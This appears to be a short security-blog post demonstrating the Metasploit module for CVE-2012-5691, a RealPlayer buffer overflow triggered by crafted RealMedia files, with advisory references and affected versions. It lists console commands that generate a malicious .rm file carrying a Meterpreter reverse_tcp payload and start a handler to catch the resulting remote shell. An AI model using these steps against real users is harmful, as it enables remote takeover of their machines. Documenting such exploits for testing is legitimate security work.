Tag Archives: CVE-2012-5691

CVE-2012-5691 RealPlayer RealMedia File Handling Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by auto
Coordinated public release of the vulnerability the 2012-12-14
Metasploit PoC provided the 2012-12-25

PoC provided by :

suto

Reference(s) :

CVE-2012-5691
OSVDB-88486
BID-56956
RealNetworks Security Advisory

Affected version(s) :

Real Player version 15.0.5.109 and bellow

Tested on Windows XP Pro SP3 with :

Real Player 15.0.5.109

Description :

This module exploits a stack based buffer overflow on RealPlayer prior or equal to 15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods.

Commands :

use exploit/windows/fileformat/real_player_url_property_bof
set FILENAME msf.rm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

sysinfo
getuid